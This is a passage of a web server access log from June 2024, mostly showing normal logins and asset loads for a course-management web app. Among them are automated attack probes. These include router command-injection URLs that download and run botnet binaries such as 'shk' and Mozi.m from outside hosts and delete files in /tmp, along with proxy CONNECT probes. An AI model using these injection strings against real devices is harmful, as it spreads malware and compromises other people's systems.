HTTP/1.1" 200 58862 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/daterangepicker/daterangepicker.js HTTP/1.1" 200 67842 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/tempusdominus-bootstrap-4/js/tempusdominus-bootstrap-4.min.js HTTP/1.1" 200 61588 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/overlayScrollbars/js/jquery.overlayScrollbars.min.js HTTP/1.1" 200 42602 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/bs-stepper/js/bs-stepper.min.js HTTP/1.1" 200 6226 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/summernote/summernote-bs4.min.js HTTP/1.1" 200 153030 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/dist/js/adminlte.js HTTP/1.1" 200 104260 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/toastr/toastr.min.js HTTP/1.1" 200 5251 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/dist/css/adminlte.min.css HTTP/1.1" 200 1396747 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/sweetalert2/sweetalert2.all.min.js HTTP/1.1" 200 67428 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 78268 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/pdfmake/pdfmake.min.js HTTP/1.1" 200 909312 138.99.178.6 - - [23/Jun/2024:13:48:34 -0300] "GET /gestioncurso/public/plugins/pdfmake/vfs_fonts.js HTTP/1.1" 200 745472 149.50.103.48 - - [23/Jun/2024:14:03:14 -0300] "GET / HTTP/1.1" 200 11237 45.128.232.200 - - [23/Jun/2024:14:24:16 -0300] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 782 141.98.83.197 - - [23/Jun/2024:14:54:22 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 790 141.98.83.197 - - [23/Jun/2024:14:54:23 -0300] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 790 87.121.69.27 - - [23/Jun/2024:15:00:19 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 149.50.103.48 - - [23/Jun/2024:15:11:16 -0300] "GET / HTTP/1.1" 200 11237 179.6.101.143 - - [23/Jun/2024:15:43:06 -0300] "GET /gestioncurso HTTP/1.1" 302 - 179.6.101.143 - - [23/Jun/2024:15:43:07 -0300] "GET /gestioncurso/ HTTP/1.1" 302 - 179.6.101.143 - - [23/Jun/2024:15:43:07 -0300] "GET /gestioncurso/login HTTP/1.1" 200 8618 179.6.101.143 - - [23/Jun/2024:15:43:07 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/css/all.min.css HTTP/1.1" 200 59305 179.6.101.143 - - [23/Jun/2024:15:43:07 -0300] "GET /gestioncurso/public/plugins/select2/css/select2.min.css HTTP/1.1" 200 14966 179.6.101.143 - - [23/Jun/2024:15:43:07 -0300] "GET /gestioncurso/public/plugins/select2-bootstrap4-theme/select2-bootstrap4.min.css HTTP/1.1" 200 6705 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/toastr/toastr.min.css HTTP/1.1" 200 6454 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/tempusdominus-bootstrap-4/css/tempusdominus-bootstrap-4.min.css HTTP/1.1" 200 11967 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/css/responsive.bootstrap4.min.css HTTP/1.1" 200 4301 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/icheck-bootstrap/icheck-bootstrap.min.css HTTP/1.1" 200 12505 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/datatables-bs4/css/dataTables.bootstrap4.min.css HTTP/1.1" 200 7496 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/css/buttons.bootstrap4.min.css HTTP/1.1" 200 9000 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/bs-stepper/css/bs-stepper.min.css HTTP/1.1" 200 3231 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/jqvmap/jqvmap.min.css HTTP/1.1" 200 613 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/daterangepicker/daterangepicker.css HTTP/1.1" 200 8069 179.6.101.143 - - [23/Jun/2024:15:43:08 -0300] "GET /gestioncurso/public/plugins/overlayScrollbars/css/OverlayScrollbars.min.css HTTP/1.1" 200 20020 179.6.101.143 - - [23/Jun/2024:15:43:09 -0300] "GET /gestioncurso/public/plugins/summernote/summernote-bs4.min.css HTTP/1.1" 200 19513 179.6.101.143 - - [23/Jun/2024:15:43:09 -0300] "GET /gestioncurso/public/plugins/jquery/jquery.min.js HTTP/1.1" 200 89501 179.6.101.143 - - [23/Jun/2024:15:43:09 -0300] "GET /gestioncurso/public/plugins/bootstrap/js/bootstrap.bundle.min.js HTTP/1.1" 200 83253 179.6.101.143 - - [23/Jun/2024:15:43:09 -0300] "GET /gestioncurso/public/plugins/jquery-ui/jquery-ui.min.js HTTP/1.1" 200 254921 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/select2/js/select2.full.min.js HTTP/1.1" 200 79172 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/dist/css/adminlte.min.css HTTP/1.1" 200 1396747 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/datatables-bs4/js/dataTables.bootstrap4.min.js HTTP/1.1" 200 4520 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/js/dataTables.responsive.min.js HTTP/1.1" 200 16849 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/js/responsive.bootstrap4.min.js HTTP/1.1" 200 3661 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/dataTables.buttons.min.js HTTP/1.1" 200 25183 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.bootstrap4.min.js HTTP/1.1" 200 1443 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/jszip/jszip.min.js HTTP/1.1" 200 95778 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/datatables/jquery.dataTables.min.js HTTP/1.1" 200 87956 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 78268 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.html5.min.js HTTP/1.1" 200 25103 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.print.min.js HTTP/1.1" 200 2514 179.6.101.143 - - [23/Jun/2024:15:43:10 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.colVis.min.js HTTP/1.1" 200 3198 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/sparklines/sparkline.js HTTP/1.1" 200 7219 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/jqvmap/jquery.vmap.min.js HTTP/1.1" 200 21150 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/jqvmap/maps/jquery.vmap.usa.js HTTP/1.1" 200 47712 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/chart.js/Chart.min.js HTTP/1.1" 200 173077 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/pdfmake/vfs_fonts.js HTTP/1.1" 200 812001 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/jquery-knob/jquery.knob.min.js HTTP/1.1" 200 10804 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/moment/moment.min.js HTTP/1.1" 200 58862 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/daterangepicker/daterangepicker.js HTTP/1.1" 200 67842 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/tempusdominus-bootstrap-4/js/tempusdominus-bootstrap-4.min.js HTTP/1.1" 200 61588 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/bs-stepper/js/bs-stepper.min.js HTTP/1.1" 200 6226 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/summernote/summernote-bs4.min.js HTTP/1.1" 200 153030 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/overlayScrollbars/js/jquery.overlayScrollbars.min.js HTTP/1.1" 200 42602 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/dist/js/adminlte.js HTTP/1.1" 200 104260 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/toastr/toastr.min.js HTTP/1.1" 200 5251 179.6.101.143 - - [23/Jun/2024:15:43:11 -0300] "GET /gestioncurso/public/plugins/sweetalert2/sweetalert2.all.min.js HTTP/1.1" 200 67428 179.6.101.143 - - [23/Jun/2024:15:43:12 -0300] "GET /gestioncurso/public/plugins/pdfmake/pdfmake.min.js HTTP/1.1" 200 1348857 179.6.101.143 - - [23/Jun/2024:15:43:13 -0300] "GET /gestioncurso/public/plugins/chart.js/Chart.min.js HTTP/1.1" 200 173077 179.6.101.143 - - [23/Jun/2024:15:43:23 -0300] "POST /gestioncurso/login HTTP/1.1" 302 - 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/inicio HTTP/1.1" 200 22563 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/toastr/toastr.min.css HTTP/1.1" 200 6454 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/tempusdominus-bootstrap-4/css/tempusdominus-bootstrap-4.min.css HTTP/1.1" 200 11967 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/css/all.min.css HTTP/1.1" 200 59305 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/select2-bootstrap4-theme/select2-bootstrap4.min.css HTTP/1.1" 200 6705 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/select2/css/select2.min.css HTTP/1.1" 200 14966 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/icheck-bootstrap/icheck-bootstrap.min.css HTTP/1.1" 200 12505 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/datatables-bs4/css/dataTables.bootstrap4.min.css HTTP/1.1" 200 7496 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/css/responsive.bootstrap4.min.css HTTP/1.1" 200 4301 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/css/buttons.bootstrap4.min.css HTTP/1.1" 200 9000 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/jqvmap/jqvmap.min.css HTTP/1.1" 200 613 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/overlayScrollbars/css/OverlayScrollbars.min.css HTTP/1.1" 200 20020 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/bs-stepper/css/bs-stepper.min.css HTTP/1.1" 200 3231 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/daterangepicker/daterangepicker.css HTTP/1.1" 200 8069 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/summernote/summernote-bs4.min.css HTTP/1.1" 200 19513 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/plugins/jquery/jquery.min.js HTTP/1.1" 200 89501 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/dist/img/loader.png HTTP/1.1" 200 16014 179.6.101.143 - - [23/Jun/2024:15:43:24 -0300] "GET /gestioncurso/public/dist/img/icono.png HTTP/1.1" 200 501 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/jquery-ui/jquery-ui.min.js HTTP/1.1" 200 254921 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/bootstrap/js/bootstrap.bundle.min.js HTTP/1.1" 200 83253 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/select2/js/select2.full.min.js HTTP/1.1" 200 79172 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/datatables/jquery.dataTables.min.js HTTP/1.1" 200 87956 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/datatables-bs4/js/dataTables.bootstrap4.min.js HTTP/1.1" 200 4520 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/js/dataTables.responsive.min.js HTTP/1.1" 200 16849 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/js/responsive.bootstrap4.min.js HTTP/1.1" 200 3661 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/dataTables.buttons.min.js HTTP/1.1" 200 25183 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.bootstrap4.min.js HTTP/1.1" 200 1443 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/jszip/jszip.min.js HTTP/1.1" 200 95778 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/pdfmake/pdfmake.min.js HTTP/1.1" 200 1348857 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/pdfmake/vfs_fonts.js HTTP/1.1" 200 812001 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.html5.min.js HTTP/1.1" 200 25103 179.6.101.143 - - [23/Jun/2024:15:43:25 -0300] "GET /gestioncurso/public/dist/css/adminlte.min.css HTTP/1.1" 200 1396747 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.print.min.js HTTP/1.1" 200 2514 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.colVis.min.js HTTP/1.1" 200 3198 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/chart.js/Chart.min.js HTTP/1.1" 200 173077 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/sparklines/sparkline.js HTTP/1.1" 200 7219 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/jqvmap/jquery.vmap.min.js HTTP/1.1" 200 21150 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/jqvmap/maps/jquery.vmap.usa.js HTTP/1.1" 200 47712 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/jquery-knob/jquery.knob.min.js HTTP/1.1" 200 10804 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/moment/moment.min.js HTTP/1.1" 200 58862 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/webfonts/fa-brands-400.woff2 HTTP/1.1" 200 76736 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 78268 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/daterangepicker/daterangepicker.js HTTP/1.1" 200 67842 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/tempusdominus-bootstrap-4/js/tempusdominus-bootstrap-4.min.js HTTP/1.1" 200 61588 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/bs-stepper/js/bs-stepper.min.js HTTP/1.1" 200 6226 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/dist/js/adminlte.js HTTP/1.1" 200 104260 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/summernote/summernote-bs4.min.js HTTP/1.1" 200 153030 179.6.101.143 - - [23/Jun/2024:15:43:26 -0300] "GET /gestioncurso/public/plugins/overlayScrollbars/js/jquery.overlayScrollbars.min.js HTTP/1.1" 200 42602 179.6.101.143 - - [23/Jun/2024:15:43:27 -0300] "GET /gestioncurso/public/plugins/toastr/toastr.min.js HTTP/1.1" 200 5251 179.6.101.143 - - [23/Jun/2024:15:43:27 -0300] "GET /gestioncurso/public/plugins/sweetalert2/sweetalert2.all.min.js HTTP/1.1" 200 67428 179.6.101.143 - - [23/Jun/2024:15:43:27 -0300] "GET /gestioncurso/public/plugins/chart.js/Chart.min.js HTTP/1.1" 200 173077 179.6.101.143 - - [23/Jun/2024:15:43:28 -0300] "GET /gestioncurso/public/dist/img/loader.png HTTP/1.1" 200 16014 179.6.101.143 - - [23/Jun/2024:15:43:28 -0300] "GET /gestioncurso/public/dist/img/icono.png HTTP/1.1" 200 501 179.6.101.143 - - [23/Jun/2024:15:43:28 -0300] "GET /gestioncurso/inicio/info HTTP/1.1" 200 77 179.6.101.143 - - [23/Jun/2024:15:43:49 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/webfonts/fa-regular-400.woff2 HTTP/1.1" 200 13224 179.6.101.143 - - [23/Jun/2024:15:43:54 -0300] "GET /gestioncurso/inicio HTTP/1.1" 200 22563 179.6.101.143 - - [23/Jun/2024:15:43:54 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/css/all.min.css HTTP/1.1" 200 59305 179.6.101.143 - - [23/Jun/2024:15:43:54 -0300] "GET /gestioncurso/public/plugins/select2/css/select2.min.css HTTP/1.1" 200 14966 179.6.101.143 - - [23/Jun/2024:15:43:54 -0300] "GET /gestioncurso/public/plugins/icheck-bootstrap/icheck-bootstrap.min.css HTTP/1.1" 200 12505 179.6.101.143 - - [23/Jun/2024:15:43:54 -0300] "GET /gestioncurso/public/plugins/select2-bootstrap4-theme/select2-bootstrap4.min.css HTTP/1.1" 200 6705 179.6.101.143 - - [23/Jun/2024:15:43:54 -0300] "GET /gestioncurso/public/plugins/toastr/toastr.min.css HTTP/1.1" 200 6454 179.6.101.143 - - [23/Jun/2024:15:43:54 -0300] "GET /gestioncurso/public/plugins/tempusdominus-bootstrap-4/css/tempusdominus-bootstrap-4.min.css HTTP/1.1" 200 11967 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/datatables-bs4/css/dataTables.bootstrap4.min.css HTTP/1.1" 200 7496 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/css/responsive.bootstrap4.min.css HTTP/1.1" 200 4301 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/css/buttons.bootstrap4.min.css HTTP/1.1" 200 9000 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/bs-stepper/css/bs-stepper.min.css HTTP/1.1" 200 3231 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/jqvmap/jqvmap.min.css HTTP/1.1" 200 613 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/overlayScrollbars/css/OverlayScrollbars.min.css HTTP/1.1" 200 20020 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/daterangepicker/daterangepicker.css HTTP/1.1" 200 8069 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/summernote/summernote-bs4.min.css HTTP/1.1" 200 19513 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/dist/img/loader.png HTTP/1.1" 200 16014 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/dist/img/icono.png HTTP/1.1" 200 501 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/bootstrap/js/bootstrap.bundle.min.js HTTP/1.1" 200 83253 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/select2/js/select2.full.min.js HTTP/1.1" 200 79172 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/datatables/jquery.dataTables.min.js HTTP/1.1" 200 87956 179.6.101.143 - - [23/Jun/2024:15:43:55 -0300] "GET /gestioncurso/public/plugins/jquery/jquery.min.js HTTP/1.1" 200 89501 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/jquery-ui/jquery-ui.min.js HTTP/1.1" 200 254921 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/datatables-bs4/js/dataTables.bootstrap4.min.js HTTP/1.1" 200 4520 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/js/dataTables.responsive.min.js HTTP/1.1" 200 16849 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/datatables-responsive/js/responsive.bootstrap4.min.js HTTP/1.1" 200 3661 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/dataTables.buttons.min.js HTTP/1.1" 200 25183 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/jszip/jszip.min.js HTTP/1.1" 200 95778 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.bootstrap4.min.js HTTP/1.1" 200 1443 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/dist/css/adminlte.min.css HTTP/1.1" 200 1396747 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.print.min.js HTTP/1.1" 200 2514 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.html5.min.js HTTP/1.1" 200 25103 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/datatables-buttons/js/buttons.colVis.min.js HTTP/1.1" 200 3198 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/sparklines/sparkline.js HTTP/1.1" 200 7219 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/chart.js/Chart.min.js HTTP/1.1" 200 173077 179.6.101.143 - - [23/Jun/2024:15:43:56 -0300] "GET /gestioncurso/public/plugins/jqvmap/jquery.vmap.min.js HTTP/1.1" 200 21150 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/jqvmap/maps/jquery.vmap.usa.js HTTP/1.1" 200 47712 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/jquery-knob/jquery.knob.min.js HTTP/1.1" 200 10804 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/pdfmake/pdfmake.min.js HTTP/1.1" 200 1348857 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/pdfmake/vfs_fonts.js HTTP/1.1" 200 812001 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/webfonts/fa-solid-900.woff2 HTTP/1.1" 200 78268 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/fontawesome-free/webfonts/fa-brands-400.woff2 HTTP/1.1" 200 76736 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/moment/moment.min.js HTTP/1.1" 200 58862 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/daterangepicker/daterangepicker.js HTTP/1.1" 200 67842 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/tempusdominus-bootstrap-4/js/tempusdominus-bootstrap-4.min.js HTTP/1.1" 200 61588 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/bs-stepper/js/bs-stepper.min.js HTTP/1.1" 200 6226 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/summernote/summernote-bs4.min.js HTTP/1.1" 200 153030 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/overlayScrollbars/js/jquery.overlayScrollbars.min.js HTTP/1.1" 200 42602 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/dist/js/adminlte.js HTTP/1.1" 200 104260 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/toastr/toastr.min.js HTTP/1.1" 200 5251 179.6.101.143 - - [23/Jun/2024:15:43:57 -0300] "GET /gestioncurso/public/plugins/sweetalert2/sweetalert2.all.min.js HTTP/1.1" 200 67428 179.6.101.143 - - [23/Jun/2024:15:43:58 -0300] "GET /gestioncurso/public/plugins/chart.js/Chart.min.js HTTP/1.1" 200 173077 179.6.101.143 - - [23/Jun/2024:15:43:58 -0300] "GET /gestioncurso/public/dist/img/loader.png HTTP/1.1" 200 16014 179.6.101.143 - - [23/Jun/2024:15:43:58 -0300] "GET /gestioncurso/public/dist/img/icono.png HTTP/1.1" 200 501 179.6.101.143 - - [23/Jun/2024:15:43:58 -0300] "GET /gestioncurso/inicio/info HTTP/1.1" 200 77 87.121.69.27 - - [23/Jun/2024:16:41:12 -0300] "CONNECT google.com:443 HTTP/1.1" 501 725 45.128.232.200 - - [23/Jun/2024:16:45:39 -0300] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 782 149.50.103.48 - - [23/Jun/2024:17:07:56 -0300] "GET / HTTP/1.1" 200 11237 210.187.143.28 - - [23/Jun/2024:17:43:15 -0300] "GET / HTTP/1.1" 200 11237 45.128.232.200 - - [23/Jun/2024:18:02:38 -0300] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 782 94.156.66.81 - - [23/Jun/2024:18:03:17 -0300] "CONNECT 193.149.189.126:7227 HTTP/1.1" 501 725 42.236.129.51 - - [23/Jun/2024:18:09:40 -0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 761 45.148.10.174 - - [23/Jun/2024:18:17:31 -0300] "GET 